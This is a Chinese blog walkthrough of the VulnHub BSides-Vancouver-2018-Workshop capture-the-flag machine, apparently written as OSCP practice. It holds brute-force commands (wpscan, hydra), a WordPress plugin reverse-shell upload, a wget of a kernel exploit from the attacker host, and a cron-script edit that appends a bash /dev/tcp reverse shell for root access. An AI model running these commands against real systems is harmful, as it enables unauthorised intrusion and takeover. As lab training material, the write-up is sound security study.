当前位置: 首页 > backend >正文

OSCP备战-BSides-Vancouver-2018-Workshop靶机详细步骤

一、靶机介绍

靶机地址:https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop%2C231/

靶机难度:中级(CTF)

靶机发布日期:2018年3月21日

靶机描述:

Boot2root挑战旨在创建一个安全的环境,您可以在该环境中对(故意)易受攻击的目标执行真实的渗透测试。

目标:得到root权限&找到flag.txt

作者:DXR嗯嗯呐

二、信息探测

1、目标IP发现:

得到IP:192.168.155.188

2、端口扫描

nmap -p-  --min-rate 1000 -T4 192.168.155.188

nmap -p21,22,80 -sV -sC -A  --min-rate 1000 -T4 192.168.155.188

三、Getshell

端口扫描时发现

连接ftp:

最终找到:

保存下来

没有其他信息了,退出

拿去爆破一下ssh

很遗憾,不支持密码认证

回头又去爆了一下ftp,无果。只能看站点了

源码没有东西,进行路径扫描

dirsearch -u http://192.168.155.188/

访问得到:

又是wordpress,访问得到

没什么东西,继续扫描:

版本号:

权限有设置,只能看一些不重要的

登录页面:

Bp爆破呗:

只有john

密码不对,应该是字典太小了,就是这个思路,换个大字典应该可以

就是kali自带Bp老的线程太慢了,用wpscan弄一下

又看到admin,两个用户了

wpscan --url  http://192.168.155.188/backup_wordpress

枚举可能用户:

wpscan --url http://192.168.155.188/backup_wordpress/ --enumerate u

爆破密码:

wpscan --url http://192.168.155.188/backup_wordpress/ --passwords /usr/share/wordlists/rockyou.txt  --usernames john  --max-threads 100

得到john/enigma

拿去登录一下:

找到文件上传点:

找到自带反弹脚本:

改一下IP和端口

嗯不行

换回老地方:plugins(当然外观404也是很经典)

在这里找到:

点进去一路访问:

生成交互式命令行

python -c 'import pty; pty.spawn("/bin/bash")'

四、提权

内核提权

查看发行版:

12.04很常见了,存在内核提权的

searchsploit -m 37292.c

wget http://192.168.155.166:442/37292.c

很遗憾失败了

ssh连接su提权

Cat /etc/passwd

su john但是身份验证失败

保存一下:

hydra -L user1.txt -P /usr/share/wordlists/rockyou.txt -t 4 192.168.155.188 ssh

su直接提权

完成

定时任务

列出与系统定时目录相关的文件和配置:

ls -la /etc/cron*

echo ‘#!/bin/bash’ > cleanup

echo ‘ bash -i >& /dev/tcp/192.168.155.166/4444 0>&1’ >> cleanup

重开监听

等待获得root权限

题外话,贴一点tips

getshell后查看命令:

1、查看发行版:

      cat /etc/os-release

2、列出与系统定时目录相关的文件和配置:

      ls -la /etc/cron*

3、cat /etc/passwd  cat /etc/shadow

4、查看可以以root权限执行的命令

      sudo -l

5、查看可以以所有者身份执行的程序

      find / -type f -perm -4000 -user root 2>/dev/null

http://www.xdnf.cn/news/10758.html

相关文章:

  • 本科毕业论文总结
  • docker B站学习
  • 【Spring底层分析】Spring AOP基本使用+万字底层源码阅读分析
  • C++.凸包算法
  • windows11安装scoop 20250602
  • YOLOv11改进 | 注意力机制篇 | SEAM与C2PSA机制优化遮挡检测
  • useMemo useCallback 自定义hook
  • VMware安装Ubuntu全攻略
  • gcc编译构建流程-函数未定义问题
  • BayesFlow:基于神经网络的摊销贝叶斯推断框架
  • 数据库技术
  • 蓝云APP:云端存储,便捷管理
  • leetcode刷题日记——二叉树的层次遍历
  • 【数学 逆序对 构造】P12386 [蓝桥杯 2023 省 Python B] 混乱的数组|普及+
  • deepseek原理和项目实战笔记2 -- deepseek核心架构
  • 量子物理:深入学习量子物理的基本概念与应用
  • 量子计算在大模型微调中的技术突破
  • CAN通讯协议中各种参数解析
  • P5684 [CSP-J2019 江西] 非回文串 题解
  • BUUCTF之[ACTF2020 新生赛]BackupFile
  • 【latex】易遗忘的表达
  • Vue:组件
  • 分班 - 华为OD统一考试(JavaScript 题解)
  • 【操作系统·windows快捷键指令】
  • sql注入补充——get注入
  • 322. 零钱兑换
  • Day10
  • 【C盘瘦身】给DevEco Studio中HarmonyOSEmulator(鸿蒙模拟器)换个地方,一键移动给C盘瘦身
  • 企业级开发中的 maven-mvnd 应用实践
  • 深度理解与剖析:Odoo系统邮箱配置指南